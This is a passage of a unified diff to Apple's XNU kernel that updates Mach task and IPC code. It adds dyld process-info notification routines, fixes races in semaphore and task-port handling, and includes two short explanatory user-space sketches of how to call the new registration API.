-       sc = (suid_cred_t)port->ip_kobject;
+       sc = (suid_cred_t)ipc_kobject_get(port);
        ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
 
@@ -143,7 +143,7 @@ convert_suid_cred_to_port(suid_cred_t sc)
        }
 
        if (!ipc_kobject_make_send_lazy_alloc_port(&sc->port,
-           (ipc_kobject_t) sc, IKOT_SUID_CRED, false, 0)) {
+           (ipc_kobject_t) sc, IKOT_SUID_CRED, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                suid_cred_free(sc);
                return IP_NULL;
        }
@@ -177,7 +177,7 @@ suid_cred_verify(ipc_port_t port, struct vnode *vnode, uint32_t *uid)
                return -1;
        }
 
-       sc = (suid_cred_t)port->ip_kobject;
+       sc = (suid_cred_t)ipc_kobject_get(port);
 
        if (vnode != sc->vnode) {
                ip_unlock(port);
index 31ea5caaedf96c1f00ddd6dedb110fb2cbcab0f3..dfa8d1153ae4a89e0e4910f0df7ff31b387deb03 100644 (file)
@@ -180,6 +180,12 @@ semaphore_create(
         *  the new semaphore to the task's semaphore list.
         */
        task_lock(task);
+       /* Check for race with task_terminate */
+       if (!task->active) {
+               task_unlock(task);
+               zfree(semaphore_zone, s);
+               return KERN_INVALID_TASK;
+       }
        enqueue_head(&task->semaphore_list, (queue_entry_t) s);
        task->semaphores_owned++;
        task_unlock(task);
index 4d65fe2ae3c3bdb4ca5a0ba2b7089041ec3d3495..60af738a82aa2c1a2b1940f7f7c174c8f507e810 100644 (file)
@@ -58,7 +58,7 @@
 #include <mach/thread_switch.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_space.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/ipc_kobject.h>
 #include <kern/processor.h>
 #include <kern/sched.h>
@@ -131,8 +131,6 @@ swtch(
        }
        enable_preemption();
 
-       counter(c_swtch_block++);
-
        thread_yield_with_continuation((thread_continue_t)swtch_continue, NULL);
 }
 
@@ -170,8 +168,6 @@ swtch_pri(
        }
        enable_preemption();
 
-       counter(c_swtch_pri_block++);
-
        thread_depress_abstime(thread_depress_time);
 
        thread_yield_with_continuation((thread_continue_t)swtch_pri_continue, NULL);
index f6a6c7ad740deac63c1aec838b4e8fb3d5a3e1ee..9a2484022e4259e1840634deaa942036f6acda6d 100644 (file)
@@ -115,7 +115,7 @@ const mach_trap_t       mach_trap_table[MACH_TRAP_TABLE_COUNT] = {
 /* 10 */ MACH_TRAP(_kernelrpc_mach_vm_allocate_trap, 4, 5, munge_wwlw),
 /* 11 */ MACH_TRAP(_kernelrpc_mach_vm_purgable_control_trap, 4, 5, munge_wlww),
 /* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
-/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
+/* 13 */ MACH_TRAP(task_dyld_process_info_notify_get_trap, 2, 4, munge_ll),
 /* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
 /* 15 */ MACH_TRAP(_kernelrpc_mach_vm_map_trap, 6, 8, munge_wwllww),
 /* 16 */ MACH_TRAP(_kernelrpc_mach_port_allocate_trap, 3, 3, munge_www),
@@ -233,7 +233,7 @@ const mach_trap_t       mach_trap_table[MACH_TRAP_TABLE_COUNT] = {
 /* 127 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
 };
 
-const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
+const char * const mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 0 */ "kern_invalid",
 /* 1 */ "kern_invalid",
 /* 2 */ "kern_invalid",
@@ -247,7 +247,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 10 */ "_kernelrpc_mach_vm_allocate_trap",
 /* 11 */ "kern_invalid",
 /* 12 */ "_kernelrpc_mach_vm_deallocate_trap",
-/* 13 */ "kern_invalid",
+/* 13 */ "task_dyld_process_info_notify_get_trap",
 /* 14 */ "_kernelrpc_mach_vm_protect_trap",
 /* 15 */ "_kernelrpc_mach_vm_map_trap",
 /* 16 */ "_kernelrpc_mach_port_allocate_trap",
@@ -368,7 +368,7 @@ const char * mach_syscall_name_table[MACH_TRAP_TABLE_COUNT] = {
 /* 127 */ "kern_invalid",
 };
 
-int     mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0]));
+const int mach_trap_count = (sizeof(mach_trap_table) / sizeof(mach_trap_table[0]));
 
 kern_return_t
 kern_invalid(
index 2816a65fc768d8c080dd3d19ebe54c8830dfaea3..c15f8f09784b920e09c36909bbf3882802e8fa02 100644 (file)
@@ -88,7 +88,7 @@ typedef struct {
 
 
 extern const mach_trap_t       mach_trap_table[];
-extern int                     mach_trap_count;
+extern const int                       mach_trap_count;
 
 #if CONFIG_REQUIRES_U32_MUNGING || (__arm__ && (__BIGGEST_ALIGNMENT__ > 4))
 
index 1ace4c3ec20ffb7e0b8fa26e86ad93e645c78067..1266acd83e8b3d820f7af5c96b0b1dc38e1790df 100644 (file)
 #include <libkern/section_keywords.h>
 
 #include <mach-o/loader.h>
+#include <kdp/kdp_dyld.h>
 
 #include <kern/sfi.h>           /* picks up ledger.h */
 
@@ -213,6 +214,10 @@ LCK_SPIN_DECLARE_ATTR(dead_task_statistics_lock, &task_lck_grp, &task_lck_attr);
 
 ledger_template_t task_ledger_template = NULL;
 
+/* global lock for task_dyld_process_info_notify_{register, deregister, get_trap} */
+LCK_GRP_DECLARE(g_dyldinfo_mtx_grp, "g_dyldinfo");
+LCK_MTX_DECLARE(g_dyldinfo_mtx, &g_dyldinfo_mtx_grp);
+
 SECURITY_READ_ONLY_LATE(struct _task_ledger_indices) task_ledgers __attribute__((used)) =
 {.cpu_time = -1,
  .tkm_private = -1,
@@ -1318,6 +1323,8 @@ task_create_internal(
                return KERN_RESOURCE_SHORTAGE;
        }
 
+       counter_alloc(&(new_task->faults));
+
 #if defined(HAS_APPLE_PAC)
        ml_task_set_rop_pid(new_task, parent_task, inherit_memory);
        ml_task_set_jop_pid(new_task, parent_task, inherit_memory);
@@ -1447,6 +1454,8 @@ task_create_internal(
        new_task->requested_policy = default_task_requested_policy;
        new_task->effective_policy = default_task_effective_policy;
 
+       new_task->task_shared_region_slide = -1;
+
        task_importance_init_from_parent(new_task, parent_task);
 
        if (parent_task != TASK_NULL) {
@@ -1551,7 +1560,6 @@ task_create_internal(
                new_task->total_system_time = 0;
                new_task->total_ptime = 0;
                new_task->total_runnable_time = 0;
-               new_task->faults = 0;
                new_task->pageins = 0;
                new_task->cow_faults = 0;
                new_task->messages_sent = 0;
@@ -1700,7 +1708,7 @@ task_rollup_accounting_info(task_t to_task, task_t from_task)
        to_task->total_system_time = from_task->total_system_time;
        to_task->total_ptime = from_task->total_ptime;
        to_task->total_runnable_time = from_task->total_runnable_time;
-       to_task->faults = from_task->faults;
+       counter_add(&to_task->faults, counter_load(&from_task->faults));
        to_task->pageins = from_task->pageins;
        to_task->cow_faults = from_task->cow_faults;
        to_task->decompressions = from_task->decompressions;
@@ -1906,6 +1914,8 @@ task_deallocate(
        btlog_remove_entries_for_element(task_ref_btlog, task);
 #endif
 
+       counter_free(&task->faults);
+
 #if CONFIG_COALITIONS
        task_release_coalitions(task);
 #endif /* CONFIG_COALITIONS */
@@ -2270,7 +2280,7 @@ task_mark_corpse(task_t task)
        task_add_to_corpse_task_list(task);
 
        task_start_halt(task);
-       thread_terminate_internal(self_thread);
+       thread_terminate_internal(self_thread, TH_TERMINATE_OPTION_NONE);
 
        (void) thread_interrupt_level(wsave);
        assert(task->halting == TRUE);
@@ -2298,6 +2308,7 @@ task_clear_corpse(task_t task)
        {
                thread_mtx_lock(th_iter);
                th_iter->inspection = FALSE;
+               ipc_thread_disable(th_iter);
                thread_mtx_unlock(th_iter);
        }
 
@@ -2356,7 +2367,7 @@ task_port_with_flavor_notify(mach_msg_header_t *msg)
                ip_unlock(port);
                return;
        }
-       task = (task_t)port->ip_kobject;
+       task = (task_t)ipc_kobject_get(port);
        kotype = ip_kotype(port);
        if (task != TASK_NULL) {
                assert((IKOT_TASK_READ == kotype) || (IKOT_TASK_INSPECT == kotype));
@@ -2369,29 +2380,40 @@ task_port_with_flavor_notify(mach_msg_header_t *msg)
                return;
        }
 
+       if (kotype == IKOT_TASK_READ) {
+               flavor = TASK_FLAVOR_READ;
+       } else {
+               flavor = TASK_FLAVOR_INSPECT;
+       }
+
        itk_lock(task);
        ip_lock(port);
-       require_ip_active(port);
        /*
+        * If the port is no longer active, then ipc_task_terminate() ran
+        * and destroyed the kobject already. Just deallocate the task
+        * ref we took and go away.
+        *
+        * It is also possible that several nsrequests are in flight,
+        * only one shall NULL-out the port entry, and this is the one
+        * that gets to dealloc the port.
+        *
         * Check for a stale no-senders notification. A call to any function
         * that vends out send rights to this port could resurrect it between
         * this notification being generated and actually being handled here.
         */
-       if (port->ip_srights > 0) {
+       if (!ip_active(port) ||
+           task->itk_task_ports[flavor] != port ||
+           port->ip_srights > 0) {
                ip_unlock(port);
                itk_unlock(task);
                task_deallocate(task);
                return;
        }
 
-       if (kotype == IKOT_TASK_READ) {
-               flavor = TASK_FLAVOR_READ;
-       } else {
-               flavor = TASK_FLAVOR_INSPECT;
-       }
-       assert(task->itk_self[flavor] == port);
-       task->itk_self[flavor] = IP_NULL;
-       port->ip_kobject = IKOT_NONE;
+       assert(task->itk_task_ports[flavor] == port);
+       task->itk_task_ports[flavor] = IP_NULL;
+
+       ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
        itk_unlock(task);
        task_deallocate(task);
@@ -2705,7 +2727,7 @@ task_terminate_internal(
         *      Terminate each thread in the task.
         */
        queue_iterate(&task->threads, thread, thread_t, task_threads) {
-               thread_terminate_internal(thread);
+               thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
        }
 
 #ifdef MACH_BSD
@@ -2931,7 +2953,7 @@ task_start_halt_locked(task_t task, boolean_t should_mark_corpse)
                        thread_mtx_unlock(thread);
                }
                if (thread != self) {
-                       thread_terminate_internal(thread);
+                       thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
                }
        }
        task->dispatchqueue_offset = dispatchqueue_offset;
@@ -3224,6 +3246,8 @@ task_threads_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
+       assert(flavor <= THREAD_FLAVOR_INSPECT);
+
        for (;;) {
                task_lock(task);
                if (!task->active) {
@@ -3315,8 +3339,14 @@ task_threads_internal(
 
                switch (flavor) {
                case THREAD_FLAVOR_CONTROL:
-                       for (i = 0; i < actual; ++i) {
-                               ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
+                       if (task == current_task()) {
+                               for (i = 0; i < actual; ++i) {
+                                       ((ipc_port_t *) thread_list)[i] = convert_thread_to_port_pinned(thread_list[i]);
+                               }
+                       } else {
+                               for (i = 0; i < actual; ++i) {
+                                       ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
+                               }
                        }
                        break;
                case THREAD_FLAVOR_READ:
@@ -3329,8 +3359,6 @@ task_threads_internal(
                                ((ipc_port_t *) thread_list)[i] = convert_thread_inspect_to_port(thread_list[i]);
                        }
                        break;
-               default:
-                       return KERN_INVALID_ARGUMENT;
                }
        }
 
@@ -3550,7 +3578,8 @@ task_suspend(
         * notification on that port (if none outstanding).
         */
        (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_resume,
-           (ipc_kobject_t)task, IKOT_TASK_RESUME, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_resume"));
+           (ipc_kobject_t)task, IKOT_TASK_RESUME, IPC_KOBJECT_ALLOC_NONE, true,
+           OS_PTRAUTH_DISCRIMINATOR("task.itk_resume"));
        port = task->itk_resume;
        task_unlock(task);
 
@@ -3559,12 +3588,19 @@ task_suspend(
         * but we'll look it up when calling a traditional resume.  Any IPC operations that
         * deallocate the send right will auto-release the suspension.
         */
-       if ((kr = ipc_kmsg_copyout_object(current_task()->itk_space, ip_to_object(port),
-           MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, &name)) != KERN_SUCCESS) {
-               printf("warning: %s(%d) failed to copyout suspension token for pid %d with error: %d\n",
-                   proc_name_address(current_task()->bsd_info), proc_pid(current_task()->bsd_info),
+       if (IP_VALID(port)) {
+               kr = ipc_object_copyout(current_space(), ip_to_object(port),
+                   MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+                   NULL, NULL, &name);
+       } else {
+               kr = KERN_SUCCESS;
+       }
+       if (kr != KERN_SUCCESS) {
+               printf("warning: %s(%d) failed to copyout suspension "
+                   "token for pid %d with error: %d\n",
+                   proc_name_address(current_task()->bsd_info),
+                   proc_pid(current_task()->bsd_info),
                    task_pid(task), kr);
-               return kr;
        }
 
        return kr;
@@ -4622,6 +4658,7 @@ task_info(
 {
        kern_return_t error = KERN_SUCCESS;
        mach_msg_type_number_t  original_task_info_count;
+       bool is_kernel_task = (task == kernel_task);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -5135,7 +5172,7 @@ task_info(
                events_info = (task_events_info_t) task_info_out;
 
 
-               events_info->faults = task->faults;
+               events_info->faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX);
                events_info->pageins = task->pageins;
                events_info->cow_faults = task->cow_faults;
                events_info->messages_sent = task->messages_sent;
@@ -5233,11 +5270,19 @@ task_info(
 
                vm_info = (task_vm_info_t)task_info_out;
 
-               if (task == kernel_task) {
+               /*
+                * Do not hold both the task and map locks,
+                * so convert the task lock into a map reference,
+                * drop the task lock, then lock the map.
+                */
+               if (is_kernel_task) {
                        map = kernel_map;
-                       /* no lock */
+                       task_unlock(task);
+                       /* no lock, no reference */
                } else {
                        map = task->map;
+                       vm_map_reference(map);
+                       task_unlock(task);
                        vm_map_lock_read(map);
                }
 
@@ -5268,7 +5313,7 @@ task_info(
                vm_info->purgeable_volatile_pmap = 0;
                vm_info->purgeable_volatile_resident = 0;
                vm_info->purgeable_volatile_virtual = 0;
-               if (task == kernel_task) {
+               if (is_kernel_task) {
                        /*
                         * We do not maintain the detailed stats for the
                         * kernel_pmap, so just count everything as
@@ -5318,16 +5363,41 @@ task_info(
                }
                *task_info_count = TASK_VM_INFO_REV0_COUNT;
 
+               if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) {
+                       /* must be captured while we still have the map lock */
+                       vm_info->min_address = map->min_offset;
+                       vm_info->max_address = map->max_offset;
+               }
+
+               /*
+                * Done with vm map things, can drop the map lock and reference,
+                * and take the task lock back.
+                *
+                * Re-validate that the task didn't die on us.
+                */
+               if (!is_kernel_task) {
+                       vm_map_unlock_read(map);
+                       vm_map_deallocate(map);
+               }
+               map = VM_MAP_NULL;
+
+               task_lock(task);
+
+               if ((task != current_task()) && (!task->active)) {
+                       error = KERN_INVALID_ARGUMENT;
+                       break;
+               }
+
                if (original_task_info_count >= TASK_VM_INFO_REV1_COUNT) {
                        vm_info->phys_footprint =
                            (mach_vm_size_t) get_task_phys_footprint(task);
                        *task_info_count = TASK_VM_INFO_REV1_COUNT;
                }
                if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) {
-                       vm_info->min_address = map->min_offset;
-                       vm_info->max_address = map->max_offset;
+                       /* data was captured above */
                        *task_info_count = TASK_VM_INFO_REV2_COUNT;
                }
+
                if (original_task_info_count >= TASK_VM_INFO_REV3_COUNT) {
                        ledger_get_lifetime_max(task->ledger,
                            task_ledgers.phys_footprint,
@@ -5413,10 +5483,6 @@ task_info(
                        *task_info_count = TASK_VM_INFO_REV5_COUNT;
                }
 
-               if (task != kernel_task) {
-                       vm_map_unlock_read(map);
-               }
-
                break;
        }
 
@@ -5560,7 +5626,7 @@ task_info(
  * checks on task_port.
  *
  * In the case of TASK_DYLD_INFO, we require the more
- * privileged task_port not the less-privileged task_name_port.
+ * privileged task_read_port not the less-privileged task_name_port.
  *
  */
 kern_return_t
@@ -5574,7 +5640,7 @@ task_info_from_user(
        kern_return_t ret;
 
        if (flavor == TASK_DYLD_INFO) {
-               task = convert_port_to_task(task_port);
+               task = convert_port_to_task_read(task_port);
        } else {
                task = convert_port_to_task_name(task_port);
        }
@@ -5586,6 +5652,298 @@ task_info_from_user(
        return ret;
 }
 
+/*
+ * Routine: task_dyld_process_info_update_helper
+ *
+ * Release send rights in release_ports.
+ *
+ * If no active ports found in task's dyld notifier array, unset the magic value
+ * in user space to indicate so.
+ *
+ * Condition:
+ *      task's itk_lock is locked, and is unlocked upon return.
+ *      Global g_dyldinfo_mtx is locked, and is unlocked upon return.
+ */
+void
+task_dyld_process_info_update_helper(
+       task_t                  task,
+       size_t                  active_count,
+       vm_map_address_t        magic_addr,    /* a userspace address */
+       ipc_port_t             *release_ports,
+       size_t                  release_count)
+{
+       void *notifiers_ptr = NULL;
+
+       assert(release_count <= DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+
+       if (active_count == 0) {
+               assert(task->itk_dyld_notify != NULL);
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+               itk_unlock(task);
+
+               kfree(notifiers_ptr, (vm_size_t)sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+               (void)copyoutmap_atomic32(task->map, MACH_PORT_NULL, magic_addr); /* unset magic */
+       } else {
+               itk_unlock(task);
+               (void)copyoutmap_atomic32(task->map, (mach_port_name_t)DYLD_PROCESS_INFO_NOTIFY_MAGIC,
+                   magic_addr);     /* reset magic */
+       }
+
+       lck_mtx_unlock(&g_dyldinfo_mtx);
+
+       for (size_t i = 0; i < release_count; i++) {
+               ipc_port_release_send(release_ports[i]);
+       }
+}
+
+/*
+ * Routine: task_dyld_process_info_notify_register
+ *
+ * Insert a send right to target task's itk_dyld_notify array. Allocate kernel
+ * memory for the array if it's the first port to be registered. Also cleanup
+ * any dead rights found in the array.
+ *
+ * Consumes sright if returns KERN_SUCCESS, otherwise MIG will destroy it.
+ *
+ * Args:
+ *     task:   Target task for the registration.
+ *     sright: A send right.
+ *
+ * Returns:
+ *     KERN_SUCCESS: Registration succeeded.
+ *     KERN_INVALID_TASK: task is invalid.
+ *     KERN_INVALID_RIGHT: sright is invalid.
+ *     KERN_DENIED: Security policy denied this call.
+ *     KERN_RESOURCE_SHORTAGE: Kernel memory allocation failed.
+ *     KERN_NO_SPACE: No available notifier port slot left for this task.
+ *     KERN_RIGHT_EXISTS: The notifier port is already registered and active.
+ *
+ *     Other error code see task_info().
+ *
+ * See Also:
+ *     task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c
+ */
+kern_return_t
+task_dyld_process_info_notify_register(
+       task_t                  task,
+       ipc_port_t              sright)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t release_count = 0, active_count = 0;
+       mach_vm_address_t ports_addr; /* a user space address */
+       kern_return_t kr;
+       boolean_t right_exists = false;
+       ipc_port_t *notifiers_ptr = NULL;
+       ipc_port_t *portp;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_TASK;
+       }
+
+       if (!IP_VALID(sright)) {
+               return KERN_INVALID_RIGHT;
+       }
+
+#if CONFIG_MACF
+       if (mac_task_check_dyld_process_info_notify_register()) {
+               return KERN_DENIED;
+       }
+#endif
+
+       kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       if (task->itk_dyld_notify == NULL) {
+               notifiers_ptr = (ipc_port_t *)
+                   kalloc_flags(sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT, Z_ZERO);
+               if (!notifiers_ptr) {
+                       return KERN_RESOURCE_SHORTAGE;
+               }
+       }
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(task);
+
+       if (task->itk_dyld_notify == NULL) {
+               task->itk_dyld_notify = notifiers_ptr;
+               notifiers_ptr = NULL;
+       }
+
+       assert(task->itk_dyld_notify != NULL);
+       /* First pass: clear dead names and check for duplicate registration */
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp != IPC_PORT_NULL && !ip_active(*portp)) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+               } else if (*portp == sright) {
+                       /* the port is already registered and is active */
+                       right_exists = true;
+               }
+
+               if (*portp != IPC_PORT_NULL) {
+                       active_count++;
+               }
+       }
+
+       if (right_exists) {
+               /* skip second pass */
+               kr = KERN_RIGHT_EXISTS;
+               goto out;
+       }
+
+       /* Second pass: register the port */
+       kr = KERN_NO_SPACE;
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp == IPC_PORT_NULL) {
+                       *portp = sright;
+                       active_count++;
+                       kr = KERN_SUCCESS;
+                       break;
+               }
+       }
+
+out:
+       assert(active_count > 0);
+
+       task_dyld_process_info_update_helper(task, active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       if (notifiers_ptr) {
+               kfree(notifiers_ptr, sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT);
+       }
+
+       return kr;
+}
+
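
A hedged user-space sketch (not part of the commit) of how a monitoring process might register a notification port with the routine above, assuming the routine is exported through MIG; register_dyld_notifier is a hypothetical helper:

#include <mach/mach.h>

kern_return_t
register_dyld_notifier(task_t target, mach_port_t *out_port)
{
	mach_port_t port;
	kern_return_t kr;

	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
	if (kr != KERN_SUCCESS) {
		return kr;
	}
	/* Hand the kernel a send right; it is stored in itk_dyld_notify. */
	kr = mach_port_insert_right(mach_task_self(), port, port,
	    MACH_MSG_TYPE_MAKE_SEND);
	if (kr != KERN_SUCCESS) {
		(void)mach_port_mod_refs(mach_task_self(), port,
		    MACH_PORT_RIGHT_RECEIVE, -1);
		return kr;
	}
	kr = task_dyld_process_info_notify_register(target, port);
	if (kr == KERN_SUCCESS) {
		*out_port = port;
	}
	return kr;
}
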
+/*
+ * Routine: task_dyld_process_info_notify_deregister
+ *
+ * Remove a send right in target task's itk_dyld_notify array matching the receive
+ * right name passed in. Deallocate kernel memory for the array if it's the last port to
+ * be deregistered, or all ports have died. Also cleanup any dead rights found in the array.
+ *
+ * Does not consume any reference.
+ *
+ * Args:
+ *     task: Target task for the deregistration.
+ *     rcv_name: The name denoting the receive right in caller's space.
+ *
+ * Returns:
+ *     KERN_SUCCESS: A matching entry was found and deregistration succeeded.
+ *     KERN_INVALID_TASK: task is invalid.
+ *     KERN_INVALID_NAME: name is invalid.
+ *     KERN_DENIED: Security policy denied this call.
+ *     KERN_FAILURE: A matching entry is not found.
+ *     KERN_INVALID_RIGHT: The name passed in does not represent a valid rcv right.
+ *
+ *     Other error code see task_info().
+ *
+ * See Also:
+ *     task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c
+ */
+kern_return_t
+task_dyld_process_info_notify_deregister(
+       task_t                  task,
+       mach_port_name_t        rcv_name)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t release_count = 0, active_count = 0;
+       boolean_t port_found = false;
+       mach_vm_address_t ports_addr; /* a user space address */
+       ipc_port_t sright;
+       kern_return_t kr;
+       ipc_port_t *portp;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_TASK;
+       }
+
+       if (!MACH_PORT_VALID(rcv_name)) {
+               return KERN_INVALID_NAME;
+       }
+
+#if CONFIG_MACF
+       if (mac_task_check_dyld_process_info_notify_register()) {
+               return KERN_DENIED;
+       }
+#endif
+
+       kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       kr = ipc_port_translate_receive(current_space(), rcv_name, &sright); /* does not produce port ref */
+       if (kr) {
+               return KERN_INVALID_RIGHT;
+       }
+
+       ip_reference(sright);
+       ip_unlock(sright);
+
+       assert(sright != IPC_PORT_NULL);
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(task);
+
+       if (task->itk_dyld_notify == NULL) {
+               itk_unlock(task);
+               lck_mtx_unlock(&g_dyldinfo_mtx);
+               ip_release(sright);
+               return KERN_FAILURE;
+       }
+
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &task->itk_dyld_notify[slot];
+               if (*portp == sright) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+                       port_found = true;
+               } else if ((*portp != IPC_PORT_NULL && !ip_active(*portp))) {
+                       release_ports[release_count++] = *portp;
+                       *portp = IPC_PORT_NULL;
+               }
+
+               if (*portp != IPC_PORT_NULL) {
+                       active_count++;
+               }
+       }
+
+       task_dyld_process_info_update_helper(task, active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       ip_release(sright);
+
+       return port_found ? KERN_SUCCESS : KERN_FAILURE;
+}
+
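
And the hypothetical counterpart for teardown, reusing the receive-right name obtained in the registration sketch above:

kern_return_t
deregister_dyld_notifier(task_t target, mach_port_t port)
{
	kern_return_t kr = task_dyld_process_info_notify_deregister(target, port);
	/* The caller still owns the receive right and may now destroy it. */
	(void)mach_port_mod_refs(mach_task_self(), port,
	    MACH_PORT_RIGHT_RECEIVE, -1);
	return kr;
}
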
 /*
  *     task_power_info
  *
index d74ddc9354aba940152560844215df41816cc44f..266ea4ce95ddfef106d2b4ae8bd07029b37fed10 100644 (file)
@@ -98,6 +98,7 @@
 #ifdef XNU_KERNEL_PRIVATE
 #include <kern/kern_cdata.h>
 #include <mach/sfi_class.h>
+#include <kern/counter.h>
 #include <kern/queue.h>
 #include <sys/kern_sysctl.h>
 #endif /* XNU_KERNEL_PRIVATE */
@@ -152,11 +153,12 @@ struct task_watchports;
 
 struct task {
        /* Synchronization/destruction information */
-       decl_lck_mtx_data(, lock);               /* Task's lock */
+       decl_lck_mtx_data(, lock);      /* Task's lock */
        os_refcnt_t     ref_count;      /* Number of references to me */
-       boolean_t       active;         /* Task has not been terminated */
-       boolean_t       halting;        /* Task is being halted */
-       boolean_t       message_app_suspended;  /* Let iokit know when pidsuspended */
+       bool            active;         /* Task has not been terminated */
+       bool            ipc_active;     /* IPC with the task ports is allowed */
+       bool            halting;        /* Task is being halted */
+       bool            message_app_suspended;  /* Let iokit know when pidsuspended */
 
        /* Virtual timers */
        uint32_t                vtimers;
@@ -207,19 +209,21 @@ struct task {
         * Different flavors of task port.
         * These flavors TASK_FLAVOR_* are defined in mach_types.h
         */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self[TASK_SELF_PORT_COUNT];    /* does not hold right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_ports") itk_task_ports[TASK_SELF_PORT_COUNT];
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self;   /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self;                     /* immovable/pinned task port, does not hold right */
        struct exception_action exc_actions[EXC_TYPES_COUNT];
        /* a send right each valid element  */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host;      /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt;  /* a send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd;      /* yet another send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; /* send right for debugmode communications */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */
-       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume;    /* a receive right to resume this task */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host;                     /* a send right */
